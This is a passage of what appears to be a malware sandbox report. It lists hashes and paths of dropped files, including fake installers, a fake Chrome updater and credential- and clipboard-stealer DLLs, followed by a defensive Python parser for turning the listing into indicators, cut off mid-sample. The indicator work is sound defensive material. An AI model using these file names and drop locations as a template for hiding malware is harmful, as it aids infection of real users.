| SHA512 | f4b88d38d5ce778170778dfa22a204e6966823c56a60589f5b28901bf41912cbae78c5e503dc2617a5080fe9fe62b1e2f1a70f96d5bdc508f26249de95ada153 |
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2310042200476662204.dll
| MD5 | e23e7fc90656694198494310a901921a |
| SHA1 | 341540eaf106932d51a3ac56cb07eeb6924f5ebd |
| SHA256 | bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75 |
| SHA512 | d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
| MD5 | 60fe01df86be2e5331b0cdbe86165686 |
| SHA1 | 2a79f9713c3f192862ff80508062e64e8e0b29bd |
| SHA256 | c08ccbc876cd5a7cdfa9670f9637da57f6a1282198a9bc71fc7d7247a6e5b7a8 |
| SHA512 | ef9f9a4dedcbfe339f4f3d07fb614645596c6f2b15608bdccdad492578b735f7cb075bdaa07178c764582ee345857ec4665f90342694e6a60786bb3d9b3a3d23 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
| MD5 | 194455d6a083a49127653d277622d086 |
| SHA1 | 4eb3a18929ca48c39439d4ab69b8b6a732244f9b |
| SHA256 | 98e0b866ae0549464cc8bd33d4054f2f996cf72dde6d138135bf4d2002ab41b0 |
| SHA512 | 0b85d81d174f0d4d8bbb7c2c913a0042597225ce3eec816bc6c85f5eae68fab25b7ef81f8756ed3e8070528786a059ab38d77e54eb99240f5c56d7db8f97a61e |
memory/2396-220-0x00000000750D0000-0x0000000075880000-memory.dmp
C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe
| MD5 | 6ad412bff055c51d135c5e6f5cf636ec |
| SHA1 | 87697c12c49f220333c4b302741ea79e66314bfb |
| SHA256 | 9b998a1a18d617e58024725dc368361b4f42171e731f49f5d0b21384942d0662 |
| SHA512 | f4b88d38d5ce778170778dfa22a204e6966823c56a60589f5b28901bf41912cbae78c5e503dc2617a5080fe9fe62b1e2f1a70f96d5bdc508f26249de95ada153 |
memory/2204-227-0x0000000000320000-0x000000000086D000-memory.dmp
memory/2036-230-0x0000000000320000-0x000000000086D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2310042200482442036.dll
| MD5 | e23e7fc90656694198494310a901921a |
| SHA1 | 341540eaf106932d51a3ac56cb07eeb6924f5ebd |
| SHA256 | bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75 |
| SHA512 | d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d |
memory/1236-234-0x00007FF6E5360000-0x00007FF6E58A3000-memory.dmp
memory/540-235-0x0000000000400000-0x000000000046A000-memory.dmp
memory/3032-238-0x0000000003700000-0x0000000003831000-memory.dmp
memory/4332-239-0x0000000000320000-0x000000000086D000-memory.dmp
memory/3032-237-0x0000000003580000-0x00000000036F1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe
| MD5 | 65e5ccda7c002e24eb090ad1c9602b0f |
| SHA1 | 2daf02ebb81660eb07cff159d9bdfd7f544c2c13 |
| SHA256 | a29e50e997346fe1b47d0c93aafc4d9e08642c199d8ec1ef79f6d09e1618c439 |
| SHA512 | c46f1eb108b79011f63ca7907e8536e78034d1be26510b9cf0ffd4b69d46adcd084467bfb1419e7e069cda27d5e61b65092d58bec7c44c4939058ab75482525e |
C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe
| MD5 | 65e5ccda7c002e24eb090ad1c9602b0f |
| SHA1 | 2daf02ebb81660eb07cff159d9bdfd7f544c2c13 |
| SHA256 | a29e50e997346fe1b47d0c93aafc4d9e08642c199d8ec1ef79f6d09e1618c439 |
| SHA512 | c46f1eb108b79011f63ca7907e8536e78034d1be26510b9cf0ffd4b69d46adcd084467bfb1419e7e069cda27d5e61b65092d58bec7c44c4939058ab75482525e |
memory/2772-245-0x0000000000400000-0x0000000000513000-memory.dmp
memory/4200-248-0x0000000000320000-0x000000000086D000-memory.dmp
memory/3396-247-0x00000221C1CB0000-0x00000221C1D34000-memory.dmp
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat
| MD5 | f749f169456bf05f8a0c6b25c6e5160e |
| SHA1 | c84a50b43a018ec3eaaa1c1f9722d510d8a9672a |
| SHA256 | 92f97b77b52b79b25d3a7b04aff3c1a09e74524a63b7872c69a18fabcb9767c3 |
| SHA512 | 34c87436d4c0855beca5c659b87c24c45347f3a22e8e98cf823f45ab6370d26369041b9b8bae991862a1b176703c7d03ba8b43e0853c6c09cdb9e8b404c2f639 |
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat
| MD5 | f749f169456bf05f8a0c6b25c6e5160e |
| SHA1 | c84a50b43a018ec3eaaa1c1f9722d510d8a9672a |
| SHA256 | 92f97b77b52b79b25d3a7b04aff3c1a09e74524a63b7872c69a18fabcb9767c3 |
| SHA512 | 34c87436d4c0855beca5c659b87c24c45347f3a22e8e98cf823f45ab6370d26369041b9b8bae991862a1b176703c7d03ba8b43e0853c6c09cdb9e8b404c2f639 |
memory/3396-256-0x00000221C3890000-0x00000221C38F2000-memory.dmp
memory/2396-261-0x0000000004E80000-0x0000000004E90000-memory.dmp
memory/3396-260-0x00000221DC1A0000-0x00000221DC1FE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe
| MD5 | 6e3efda28f9423dc58e7273a7462f593 |
| SHA1 | ca4bccdc7e1e1d53461f3c8edd2e35590fd24222 |
| SHA256 | 18bcfc151e790026f17189a06e8b02bdcb086164f8e88c785e7b11405cc566fb |
| SHA512 | d9720d6cf5338223baa5705eb9a43e8b34898b64d5c30743b48cce92692cc62984e9222fc172fe455fe1ea22b82e9a4cdedb6d6fce2242a57c5849e31f883b15 |
memory/3396-269-0x00000221DC480000-0x00000221DC490000-memory.dmp
memory/3396-268-0x00007FF8AD7B0000-0x00007FF8AE271000-memory.dmp
memory/1236-274-0x00007FF6E5360000-0x00007FF6E58A3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe
| MD5 | 6e3efda28f9423dc58e7273a7462f593 |
| SHA1 | ca4bccdc7e1e1d53461f3c8edd2e35590fd24222 |
| SHA256 | 18bcfc151e790026f17189a06e8b02bdcb086164f8e88c785e7b11405cc566fb |
| SHA512 | d9720d6cf5338223baa5705eb9a43e8b34898b64d5c30743b48cce92692cc62984e9222fc172fe455fe1ea22b82e9a4cdedb6d6fce2242a57c5849e31f883b15 |
C:\Users\Admin\AppData\Local\Temp\926387074340
| MD5 | 7425846ffb4decd1f4967054515410b4 |
| SHA1 | babe08bd4ee569d669fbc6dbe6e17c4d66a1a7b3 |
| SHA256 | 0bb84e8070d50739964d9c394fff6469c69fa9005b264a20156e58d7ca3b9afa |
| SHA512 | dbf90794775d63a8b0480699736b86b854e95cf62c7500e6f5e1ac7df5699c92f72d3b4be3347be881ea7477330aa82625cdcd0413cb0e1378d79f21fa18c2e0 |
C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe
| MD5 | 6e3efda28f9423dc58e7273a7462f593 |
| SHA1 | ca4bccdc7e1e1d53461f3c8edd2e35590fd24222 |
| SHA256 | 18bcfc151e790026f17189a06e8b02bdcb086164f8e88c785e7b11405cc566fb |
| SHA512 | d9720d6cf5338223baa5705eb9a43e8b34898b64d5c30743b48cce92692cc62984e9222fc172fe455fe1ea22b82e9a4cdedb6d6fce2242a57c5849e31f883b15 |
memory/2396-286-0x0000000006400000-0x000000000692C000-memory.dmp
memory/3948-288-0x00007FF8AD7B0000-0x00007FF8AE271000-memory.dmp
memory/3948-290-0x0000019A55500000-0x0000019A55510000-memory.dmp
memory/3948-291-0x0000019A55500000-0x0000019A55510000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n5x3pdke.ccn.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3948-297-0x0000019A6DCC0000-0x0000019A6DCE2000-memory.dmp
memory/2396-302-0x0000000004E80000-0x0000000004E90000-memory.dmp
memory/3948-305-0x0000019A55500000-0x0000019A55510000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
| MD5 | aebaf57299cd368f842cfa98f3b1658c |
| SHA1 | cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7 |
| SHA256 | d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce |
| SHA512 | 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e |
C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe
| MD5 | f8c7c7d63fe2d74fa007ace2598ff9cb |
| SHA1 | 23412ed810c3830ca9bab8cd25c61cf7d70d0b5a |
| SHA256 | fd02825ce17effb7d70ca2e9907647128241610bb1dce11a70f6f1a19d052047 |
| SHA512 | 0dfb9bcd6dd8ce3f561b885989ae4c2e78c33f110aa1bf48c4c42c467db672af422ebdbf2ef66fe6f2e21307c036fbfa885e58fc3c4fa1f9677139e818855258 |
C:\Users\Admin\AppData\Local\Temp\5a-73843-b69-7dcb7-18de614ef0c69\Waegumeqolu.exe
| MD5 | 12b9ea8a702a9737e186f8057c5b4a3a |
| SHA1 | 4184e9decf6bbc584a822098249e905644c4def2 |
| SHA256 | 0ede12df938accd1be25420696db2969815ca0a2cd22d0c68a3352faa88f1001 |
| SHA512 | f62f17cddde83b96e416a198abde4ece29f6e26bc95ee72f151ab05594859a1cf69afb918f4f1a0ef5d6a660b2d2cead419f9b396698512a8d32bb877ce50713 |
C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe
| MD5 | f8c7c7d63fe2d74fa007ace2598ff9cb |
| SHA1 | 23412ed810c3830ca9bab8cd25c61cf7d70d0b5a |
| SHA256 | fd02825ce17effb7d70ca2e9907647128241610bb1dce11a70f6f1a19d052047 |
| SHA512 | 0dfb9bcd6dd8ce3f561b885989ae4c2e78c33f110aa1bf48c4c42c467db672af422ebdbf2ef66fe6f2e21307c036fbfa885e58fc3c4fa1f9677139e818855258 |
C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe
| MD5 | f8c7c7d63fe2d74fa007ace2598ff9cb |
| SHA1 | 23412ed810c3830ca9bab8cd25c61cf7d70d0b5a |
| SHA256 | fd02825ce17effb7d70ca2e9907647128241610bb1dce11a70f6f1a19d052047 |
| SHA512 | 0dfb9bcd6dd8ce3f561b885989ae4c2e78c33f110aa1bf48c4c42c467db672af422ebdbf2ef66fe6f2e21307c036fbfa885e58fc3c4fa1f9677139e818855258 |
memory/5140-342-0x0000000001040000-0x0000000001050000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5a-73843-b69-7dcb7-18de614ef0c69\Waegumeqolu.exe.config
| MD5 | 98d2687aec923f98c37f7cda8de0eb19 |
| SHA1 | f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7 |
| SHA256 | 8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465 |
| SHA512 | 95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590 |
C:\Users\Admin\AppData\Local\Temp\5a-73843-b69-7dcb7-18de614ef0c69\Waegumeqolu.exe
| MD5 | 12b9ea8a702a9737e186f8057c5b4a3a |
| SHA1 | 4184e9decf6bbc584a822098249e905644c4def2 |
| SHA256 | 0ede12df938accd1be25420696db2969815ca0a2cd22d0c68a3352faa88f1001 |
| SHA512 | f62f17cddde83b96e416a198abde4ece29f6e26bc95ee72f151ab05594859a1cf69afb918f4f1a0ef5d6a660b2d2cead419f9b396698512a8d32bb877ce50713 |
memory/5140-344-0x000000006D6B0000-0x000000006DC61000-memory.dmp
memory/2096-347-0x0000000000400000-0x0000000000414000-memory.dmp
memory/3032-349-0x0000000003700000-0x0000000003831000-memory.dmp
memory/5140-352-0x000000006D6B0000-0x000000006DC61000-memory.dmp
memory/3396-348-0x00007FF8AD7B0000-0x00007FF8AE271000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp
| MD5 | 7bf46cc89fa0ea81ece9fc0eb9d38807 |
| SHA1 | 803040acb0d2dda44091c23416586aaeeed04e4a |
| SHA256 | 31793ff8cdff66c5eb829ff1637d12b7afebd5fc95794946baccb6e96bf54649 |
| SHA512 | 371c053ae2e4a0ab530b597c5cb9e07a35b9b391b79afa06b9c7bc3b4c172e8ffbd83aefd931c5eb39c9a4e8c991f74dfff94eb9014be5cb9af3edef7a335d41 |
memory/5248-354-0x0000000001FE0000-0x0000000001FE1000-memory.dmp
memory/3948-355-0x0000019A55500000-0x0000019A55510000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5a-73843-b69-7dcb7-18de614ef0c69\Waegumeqolu.exe
| MD5 | 12b9ea8a702a9737e186f8057c5b4a3a |
| SHA1 | 4184e9decf6bbc584a822098249e905644c4def2 |
| SHA256 | 0ede12df938accd1be25420696db2969815ca0a2cd22d0c68a3352faa88f1001 |
| SHA512 | f62f17cddde83b96e416a198abde4ece29f6e26bc95ee72f151ab05594859a1cf69afb918f4f1a0ef5d6a660b2d2cead419f9b396698512a8d32bb877ce50713 |
memory/2096-333-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-PNQH7.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
memory/2772-361-0x0000000000400000-0x0000000000513000-memory.dmp
memory/540-365-0x0000000000400000-0x000000000046A000-memory.dmp
memory/5140-372-0x000000006D6B0000-0x000000006DC61000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp
| MD5 | 7bf46cc89fa0ea81ece9fc0eb9d38807 |
| SHA1 | 803040acb0d2dda44091c23416586aaeeed04e4a |
| SHA256 | 31793ff8cdff66c5eb829ff1637d12b7afebd5fc95794946baccb6e96bf54649 |
| SHA512 | 371c053ae2e4a0ab530b597c5cb9e07a35b9b391b79afa06b9c7bc3b4c172e8ffbd83aefd931c5eb39c9a4e8c991f74dfff94eb9014be5cb9af3edef7a335d41 |
memory/5248-392-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/3948-393-0x00007FF8AD7B0000-0x00007FF8AE271000-memory.dmp
memory/2096-394-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\opera_package
| MD5 | 1b4af0087d5df808f26f57534a532aa9 |
| SHA1 | d32d1fcecbef0e361d41943477a1df25114ce7af |
| SHA256 | 22c21ff3d0f5af1c2191318ea12921cfd5434afc32c0641d58fd3f3a218ea111 |
| SHA512 | e5a32022fd08464a24c89819703fd9f05c75bd5b47392aae186b96a8e1146fb0c98cda14bfec9a1393c0cdde706db77d32e7a9a86e4611c72103265982d31e07 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
| MD5 | 6f6dacd31cba5be683dc1d7aaf884829 |
| SHA1 | 270c0a13ad69d44ffdff00f2e3db62c64b80d5f7 |
| SHA256 | 5d71c61ddfd9e3a0ee69a4391b4aa3341b640dab6d1ba87334932b45ec9cd110 |
| SHA512 | b28187482f59e37bb1aab75218e3888cea34823c44d37677acef81c1c574fa2af65108cb1eeaed08a0e63920ac39386ca272d308424e8f351f57886ab694c8cf |
memory/2396-418-0x0000000004E80000-0x0000000004E90000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml
| MD5 | 546d67a48ff2bf7682cea9fac07b942e |
| SHA1 | a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90 |
| SHA256 | eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a |
| SHA512 | 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe |
C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe
| MD5 | 7af78ecfa55e8aeb8b699076266f7bcf |
| SHA1 | 432c9deb88d92ae86c55de81af26527d7d1af673 |
| SHA256 | f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e |
| SHA512 | 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e |
memory/1236-424-0x00007FF6E5360000-0x00007FF6E58A3000-memory.dmp
C:\Program Files\Google\Chrome\updater.exe
| MD5 | 7af78ecfa55e8aeb8b699076266f7bcf |
| SHA1 | 432c9deb88d92ae86c55de81af26527d7d1af673 |
| SHA256 | f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e |
| SHA512 | 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\additional_file0.tmp
| MD5 | 79ef7e63ffe3005c8edacaa49e997bdc |
| SHA1 | 9a236cb584c86c0d047ce55cdda4576dd40b027e |
| SHA256 | 388a4c959063e7edf133058e2cf797574bed808776a7c9a0307aaeb718ff7bd1 |
| SHA512 | 59ee17f0f452617bcd1a4e42947310c52c21e88d31f1d6a09ebdb6ab400fcb1f997627a0f97fa185e58683d65a45425f8a7ec698f63a84d91c838e0f7e899094 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe
| MD5 | 79ef7e63ffe3005c8edacaa49e997bdc |
| SHA1 | 9a236cb584c86c0d047ce55cdda4576dd40b027e |
| SHA256 | 388a4c959063e7edf133058e2cf797574bed808776a7c9a0307aaeb718ff7bd1 |
| SHA512 | 59ee17f0f452617bcd1a4e42947310c52c21e88d31f1d6a09ebdb6ab400fcb1f997627a0f97fa185e58683d65a45425f8a7ec698f63a84d91c838e0f7e899094 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe
| MD5 | 79ef7e63ffe3005c8edacaa49e997bdc |
| SHA1 | 9a236cb584c86c0d047ce55cdda4576dd40b027e |
| SHA256 | 388a4c959063e7edf133058e2cf797574bed808776a7c9a0307aaeb718ff7bd1 |
| SHA512 | 59ee17f0f452617bcd1a4e42947310c52c21e88d31f1d6a09ebdb6ab400fcb1f997627a0f97fa185e58683d65a45425f8a7ec698f63a84d91c838e0f7e899094 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\assistant_installer.exe
| MD5 | 0d88834a56d914983a2fe03d6c8c7a83 |
| SHA1 | e1ecd04c3610fe5f9df9bb747ee4754ccbdddb35 |
| SHA256 | e61426a4c8d7d18d497e7ae7db69c470bae545a630e2d27eada917135fc65f53 |
| SHA512 | 95233cbcc81838b16825ab7bd52981d99ae4ec27c91fcd5285bff5c4e6fcea43f4a0c78617c0b9404fb69d6d83871b32f0ed6c58ca62e73e41cd999b813c3fc1 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\dbghelp.dll
| MD5 | 2215b082f5128ab5e3f28219f9c4118a |
| SHA1 | 20c6e3294a5b8ebbebb55fc0e025afff33c3834d |
| SHA256 | 98593b37dfe911eea2fee3014fb1b5460c73433b73dc211d063701353441706d |
| SHA512 | 3e1249a0b4baad228045f4869273821f97a0cd108bc9385478e562e91830f6bc369810d6f4021c6e04e79b9ec0f4088056f4998950af46f6ab50366522aa887d |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\dbgcore.DLL
| MD5 | 15a2bc75539a13167028a3d2940bf40a |
| SHA1 | 1aed6d2855b26aa7a8fb06d690a89da3fc8eca86 |
| SHA256 | 07465dffa02c99d11dcd0a81ab7cea1fc97ef6666f37b2fd10592c1c463bf693 |
| SHA512 | 141d44339fb706971a0b481e1987a0a0eb71e63d485404548ff7443ddf744a8b6a5f869c33e49141b974cdaf17e0a654785c8ddac789c2fb821ba0a8b72dea9d |
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat
| MD5 | f749f169456bf05f8a0c6b25c6e5160e |
| SHA1 | c84a50b43a018ec3eaaa1c1f9722d510d8a9672a |
| SHA256 | 92f97b77b52b79b25d3a7b04aff3c1a09e74524a63b7872c69a18fabcb9767c3 |
| SHA512 | 34c87436d4c0855beca5c659b87c24c45347f3a22e8e98cf823f45ab6370d26369041b9b8bae991862a1b176703c7d03ba8b43e0853c6c09cdb9e8b404c2f639 |
memory/4616-478-0x00007FF79D2C0000-0x00007FF79D803000-memory.dmp
memory/4940-490-0x00007FF8AD7B0000-0x00007FF8AE271000-memory.dmp
memory/4940-491-0x00000259797C0000-0x00000259797D0000-memory.dmp
memory/4940-492-0x00000259797C0000-0x00000259797D0000-memory.dmp
memory/4940-503-0x0000025979FB0000-0x0000025979FCC000-memory.dmp
memory/4940-504-0x0000025979FD0000-0x000002597A085000-memory.dmp
memory/4940-505-0x00007FF49BF90000-0x00007FF49BFA0000-memory.dmp
memory/4940-506-0x000002597A090000-0x000002597A09A000-memory.dmp
memory/4940-507-0x000002597A200000-0x000002597A21C000-memory.dmp
memory/4940-509-0x000002597A1E0000-0x000002597A1EA000-memory.dmp
C:\Windows\TEMP\xyvvnnvseiqa.xml
| MD5 | 546d67a48ff2bf7682cea9fac07b942e |
| SHA1 | a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90 |
| SHA256 | eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a |
| SHA512 | 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe |
C:\Program Files\Google\Chrome\updater.exe
| MD5 | 7af78ecfa55e8aeb8b699076266f7bcf |
| SHA1 | 432c9deb88d92ae86c55de81af26527d7d1af673 |
| SHA256 | f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e |
| SHA512 | 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e |
memory/6080-524-0x00000000003D0000-0x00000000003F0000-memory.dmp
memory/4616-525-0x00007FF79D2C0000-0x00007FF79D803000-memory.dmp
C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll
| MD5 | 4bd56443d35c388dbeabd8357c73c67d |
| SHA1 | 26248ce8165b788e2964b89d54d1f1125facf8f9 |
| SHA256 | 021882d0f0cdc7275247b2ef6cc02a28cf0f02971de5b9afa947ffe7b63fb867 |
| SHA512 | 100dc81a0d74725d74ed3801d7828c53c36315179427e88404cb482f83afc0e8766fd86642b4396b37dd7e3262d66d7138c8b4a175354af98254869fbdd43192 |
C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll
| MD5 | 49b3faf5b84f179885b1520ffa3ef3da |
| SHA1 | c1ac12aeca413ec45a4f09aa66f0721b4f80413e |
| SHA256 | b89189d3fca0a41aee9d4582a8efbe820d49e87224c325b4a0f4806d96bf86a5 |
| SHA512 | 018d531b3328267ecaebcb9f523c386c8aa36bf29e7b2e0f61bd96a0f7f2d03c7f25f878c373fbce7e44c8d5512e969b816ed9c72edb44afa302670c652de742 |
memory/6044-544-0x00007FF6F0040000-0x00007FF6F0053000-memory.dmp
memory/6080-545-0x00007FF6C0270000-0x00007FF6C0AB0000-memory.dmp
memory/6080-551-0x00007FF6C0270000-0x00007FF6C0AB0000-memory.dmp
memory/6080-560-0x00007FF6C0270000-0x00007FF6C0AB0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YQR9M4BX\s54[1].htm
| MD5 | e1671797c52e15f763380b45e841ec32 |
| SHA1 | 58e6b3a414a1e090dfc6029add0f3555ccba127f |
| SHA256 | 3f79bb7b435b05321651daefd374cdc681dc06faa65e374e38337b88ca046dea |
| SHA512 | 87c568e037a5fa50b1bc911e8ee19a77c4dd3c22bce9932f86fdd8a216afe1681c89737fada6859e91047eece711ec16da62d6ccb9fd0de2c51f132347350d8c |
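The dropped-file listing above is the part of this report most analysts actually consume, and it is tedious to turn into usable indicators by hand: hashes are spread over `| ALGO | hex |` rows under a bare path line, the same file is often repeated once per write event, and `memory/<pid>-<n>-<start>-<end>-memory.dmp` lines for in-memory regions are mixed in. The following Python is an added example, not part of the sandbox report or of any vendor tooling. It parses this exact line format, validates digest lengths, merges repeated entries (keyed on SHA256 plus case-folded path, since NTFS is case-insensitive), computes memory-region sizes, and applies three location heuristics that are my assumptions rather than page facts: a DLL or EXE under a random hex-named directory in `AppData\Roaming`, a write under `C:\Windows\TEMP`, and an executable written under `Program Files`. The sample input is constructed from a handful of the entries listed on this page.

```python
"""Turn a sandbox 'dropped files' listing into de-duplicated IOC records.

Added example, not sandbox or vendor code. Line shapes are assumed from the
listing on this page: a bare path line followed by `| MD5 | hex |`-style rows,
and `memory/<pid>-<n>-0x<start>-0x<end>-memory.dmp` for memory regions.
"""
import json
import re
from dataclasses import dataclass, field

HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9A-Fa-f]+)\s*\|$")
MEM_LINE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

# Heuristic (assumption): a random hex-named directory directly under Roaming is
# a common drop location for stealer plugins and persistence payloads.
ROAMING_HEX_DIR = re.compile(r"\\AppData\\Roaming\\[0-9a-f]{12,}\\", re.I)


@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)
    seen: int = 1  # how many times the listing repeated this file


@dataclass
class MemoryRegion:
    pid: int
    index: int
    start: int
    end: int

    @property
    def size(self) -> int:
        return self.end - self.start


def parse_listing(text: str):
    """Return (files, regions). Files keep listing order and are not yet merged."""
    files, regions, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := MEM_LINE.match(line):
            regions.append(MemoryRegion(int(m[1]), int(m[2]), int(m[3], 16), int(m[4], 16)))
            current = None  # a memory line closes the previous file entry
            continue
        if m := HASH_ROW.match(line):
            if current is None:
                raise ValueError(f"hash row with no preceding path: {line}")
            algo, digest = m[1], m[2].lower()
            if len(digest) != HEX_LEN[algo]:
                raise ValueError(f"{algo} digest has wrong length for {current.path}")
            current.hashes[algo] = digest
            continue
        current = DroppedFile(line)  # any other line starts a new file entry
        files.append(current)
    return files, regions


def dedupe(files):
    """Merge repeated entries; NTFS paths are case-insensitive, so fold case."""
    merged = {}
    for f in files:
        key = (f.hashes.get("SHA256"), f.path.lower())
        if key in merged:
            merged[key].seen += 1
        else:
            merged[key] = DroppedFile(f.path, dict(f.hashes))
    return list(merged.values())


def flag_reasons(path: str):
    """Location heuristics only; they say nothing about the file's content."""
    reasons, low = [], path.lower()
    if ROAMING_HEX_DIR.search(path):
        reasons.append("roaming-random-hex-dir")
    if "\\windows\\temp\\" in low:
        reasons.append("windows-temp-write")
    if "\\program files" in low and low.endswith(".exe"):
        reasons.append("exe-in-program-files")
    return reasons


def ioc_records(text: str):
    """Parsed, merged and flagged records plus the memory regions seen."""
    files, regions = parse_listing(text)
    records = [{"path": f.path, "sha256": f.hashes.get("SHA256"),
                "md5": f.hashes.get("MD5"), "seen": f.seen,
                "flags": flag_reasons(f.path)} for f in dedupe(files)]
    return records, regions


# Constructed sample: a few entries copied from the listing on this page.
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\dbghelp.dll
| MD5 | 2215b082f5128ab5e3f28219f9c4118a |
| SHA1 | 20c6e3294a5b8ebbebb55fc0e025afff33c3834d |
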